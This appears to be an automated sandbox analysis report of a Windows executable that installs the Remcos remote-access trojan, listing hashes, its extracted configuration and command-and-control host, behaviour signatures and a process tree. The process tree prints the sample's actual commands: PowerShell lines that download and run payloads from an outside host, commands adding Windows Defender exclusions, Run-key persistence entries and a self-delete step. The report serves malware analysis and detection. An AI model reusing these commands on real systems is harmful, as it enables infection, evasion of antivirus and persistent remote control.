Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
24-08-2022 20:25
Static task
static1
Behavioral task
behavioral1
Sample
74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe
Resource
win10-20220812-en
General
-
Target
74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe
-
Size
149KB
-
MD5
8e34dbf3bceb9c9cf22f32ea7d870be4
-
SHA1
d9cd6c07ee134e10b179821808f617cdf2dc810b
-
SHA256
74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056
-
SHA512
3ccb54fdd4dff867a760c11b94f147b503ffd015cd5d8ee11a86f6afa0cfb3fe3507420bf5d94ee85f7c6773e0aa58084b83b142aa54cf9baea4824438143b47
-
SSDEEP
3072:J90Eg7YOC0q0vGBYovRDlDybNTPCtRqFvYs:1gYtvJDlmbRX
Malware Config
Extracted
http://cothdesigns.com:443/obieznne.msi
Extracted
http://cothdesigns.com:443/KMS_Tool.msi
Extracted
remcos
220825
cothdesigns.com:3456
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
180
-
copy_file
software_reporter_tool.exe
-
copy_folder
AppData\Local\Google
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%UserProfile%
-
keylog_crypt
true
-
keylog_file
adbkey.dat
-
keylog_flag
false
-
keylog_path
%Temp%
-
mouse_option
false
-
mutex
9416a517bdcd8521-XQOB43
-
screenshot_crypt
true
-
screenshot_flag
true
-
screenshot_folder
Google
-
screenshot_path
%Temp%
-
screenshot_time
60
-
startup_value
Google
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Google = "\"C:\\Users\\Admin\\AppData\\Local\\Google\\software_reporter_tool.exe\"" reg.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 11 3492 powershell.exe 12 956 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
software_reporter_tool.exepid process 4592 software_reporter_tool.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google = "\"C:\\Users\\Admin\\AppData\\Local\\Google\\software_reporter_tool.exe\"" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
software_reporter_tool.exedescription pid process target process PID 4592 set thread context of 4724 4592 software_reporter_tool.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exepowershell.exepowershell.exepowershell.exesoftware_reporter_tool.exepid process 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe 4608 powershell.exe 956 powershell.exe 3492 powershell.exe 4608 powershell.exe 3492 powershell.exe 956 powershell.exe 4608 powershell.exe 956 powershell.exe 3492 powershell.exe 4592 software_reporter_tool.exe 4592 software_reporter_tool.exe 4592 software_reporter_tool.exe 4592 software_reporter_tool.exe 4592 software_reporter_tool.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 3492 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeIncreaseQuotaPrivilege 4608 powershell.exe Token: SeSecurityPrivilege 4608 powershell.exe Token: SeTakeOwnershipPrivilege 4608 powershell.exe Token: SeLoadDriverPrivilege 4608 powershell.exe Token: SeSystemProfilePrivilege 4608 powershell.exe Token: SeSystemtimePrivilege 4608 powershell.exe Token: SeProfSingleProcessPrivilege 4608 powershell.exe Token: SeIncBasePriorityPrivilege 4608 powershell.exe Token: SeCreatePagefilePrivilege 4608 powershell.exe Token: SeBackupPrivilege 4608 powershell.exe Token: SeRestorePrivilege 4608 powershell.exe Token: SeShutdownPrivilege 4608 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeSystemEnvironmentPrivilege 4608 powershell.exe Token: SeRemoteShutdownPrivilege 4608 powershell.exe Token: SeUndockPrivilege 4608 powershell.exe Token: SeManageVolumePrivilege 4608 powershell.exe Token: 33 4608 powershell.exe Token: 34 4608 powershell.exe Token: 35 4608 powershell.exe Token: 36 4608 powershell.exe Token: SeIncreaseQuotaPrivilege 4608 powershell.exe Token: SeSecurityPrivilege 4608 powershell.exe Token: SeTakeOwnershipPrivilege 4608 powershell.exe Token: SeLoadDriverPrivilege 4608 powershell.exe Token: SeSystemProfilePrivilege 4608 powershell.exe Token: SeSystemtimePrivilege 4608 powershell.exe Token: SeProfSingleProcessPrivilege 4608 powershell.exe Token: SeIncBasePriorityPrivilege 4608 powershell.exe Token: SeCreatePagefilePrivilege 4608 powershell.exe Token: SeBackupPrivilege 4608 powershell.exe Token: SeRestorePrivilege 4608 powershell.exe Token: SeShutdownPrivilege 4608 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeSystemEnvironmentPrivilege 4608 powershell.exe Token: SeRemoteShutdownPrivilege 4608 powershell.exe Token: SeUndockPrivilege 4608 powershell.exe Token: SeManageVolumePrivilege 4608 powershell.exe Token: 33 4608 powershell.exe Token: 34 4608 powershell.exe Token: 35 4608 powershell.exe Token: 36 4608 powershell.exe Token: SeIncreaseQuotaPrivilege 4608 powershell.exe Token: SeSecurityPrivilege 4608 powershell.exe Token: SeTakeOwnershipPrivilege 4608 powershell.exe Token: SeLoadDriverPrivilege 4608 powershell.exe Token: SeSystemProfilePrivilege 4608 powershell.exe Token: SeSystemtimePrivilege 4608 powershell.exe Token: SeProfSingleProcessPrivilege 4608 powershell.exe Token: SeIncBasePriorityPrivilege 4608 powershell.exe Token: SeCreatePagefilePrivilege 4608 powershell.exe Token: SeBackupPrivilege 4608 powershell.exe Token: SeRestorePrivilege 4608 powershell.exe Token: SeShutdownPrivilege 4608 powershell.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeSystemEnvironmentPrivilege 4608 powershell.exe Token: SeRemoteShutdownPrivilege 4608 powershell.exe Token: SeUndockPrivilege 4608 powershell.exe Token: SeManageVolumePrivilege 4608 powershell.exe Token: 33 4608 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
InstallUtil.exepid process 4724 InstallUtil.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
cmd.execmd.execmd.execmd.exe74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.execmd.exepowershell.exesoftware_reporter_tool.exedescription pid process target process PID 4828 wrote to memory of 4884 4828 cmd.exe netsh.exe PID 4828 wrote to memory of 4884 4828 cmd.exe netsh.exe PID 4448 wrote to memory of 1388 4448 cmd.exe netsh.exe PID 4448 wrote to memory of 1388 4448 cmd.exe netsh.exe PID 4120 wrote to memory of 4240 4120 cmd.exe reg.exe PID 4120 wrote to memory of 4240 4120 cmd.exe reg.exe PID 1592 wrote to memory of 3380 1592 cmd.exe reg.exe PID 1592 wrote to memory of 3380 1592 cmd.exe reg.exe PID 2708 wrote to memory of 3688 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe cmd.exe PID 2708 wrote to memory of 3688 2708 74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe cmd.exe PID 3688 wrote to memory of 4600 3688 cmd.exe choice.exe PID 3688 wrote to memory of 4600 3688 cmd.exe choice.exe PID 3492 wrote to memory of 4592 3492 powershell.exe software_reporter_tool.exe PID 3492 wrote to memory of 4592 3492 powershell.exe software_reporter_tool.exe PID 3492 wrote to memory of 4592 3492 powershell.exe software_reporter_tool.exe PID 4592 wrote to memory of 1368 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 1368 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 1368 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4608 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4608 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4608 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe PID 4592 wrote to memory of 4724 4592 software_reporter_tool.exe InstallUtil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe"C:\Users\Admin\AppData\Local\Temp\74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del C:\Users\Admin\AppData\Local\Temp\74b1f33dc283a64df996251ad950a1c8bdba5ab77da45c97233972d2a8c17056.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.81⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\netsh.exenetsh interface ipv4 set dns name=Ethernet static 8.8.8.82⤵PID:4884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=21⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\system32\netsh.exenetsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=22⤵PID:1388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f1⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f2⤵
- Adds policy Run key to start application
- Modifies registry key
PID:4240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f1⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Google /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe\" /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:3380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns.com:443/obieznne.msi','C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe');C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\software_reporter_tool.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵PID:1368
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵PID:4608
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetWindowsHookEx
PID:4724
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns.com:443/KMS_Tool.msi','C:\Users\Admin\AppData\Local\Temp\mwucxmvb.exe');C:\Users\Admin\AppData\Local\Temp\mwucxmvb.exe1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5f7f90d8534bb346735f6cd493bf056ac
SHA112c6d5bd30a6a527f54a3f75a11b79732e0d423d
SHA25662ed1666f0b8e675d3b0f3a4aad789a2e16ff1678c790675760f5e512a573fd1
SHA5128c75a11cfab2f5c5217b605eed84d170e6c08289fbc32237b905909a6d8a52822cba60f9f6ef48d42ea297d47a66751579ee87d6a638b21d73fd8641ce4651d1
-
Filesize
2.4MB
MD5f7f90d8534bb346735f6cd493bf056ac
SHA112c6d5bd30a6a527f54a3f75a11b79732e0d423d
SHA25662ed1666f0b8e675d3b0f3a4aad789a2e16ff1678c790675760f5e512a573fd1
SHA5128c75a11cfab2f5c5217b605eed84d170e6c08289fbc32237b905909a6d8a52822cba60f9f6ef48d42ea297d47a66751579ee87d6a638b21d73fd8641ce4651d1
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1KB
MD5aaa8e5c3ec5568db80bcb624fe4f398b
SHA104101a67873cd65a523a9778f2afd63fb6e24649
SHA2565f3be02b6d5b584ac7a6aa0d20c77e997db7b0b1fa89bc5bba812abf26f60327
SHA512d928c26e200c4df5a6413bf77e68611fa9a80b05d789b142bd3b42ad23d7d8b2e8b80ba11a7693f668b0be9336041ee2d9925c5c5c4029150699ca6e2a6a369c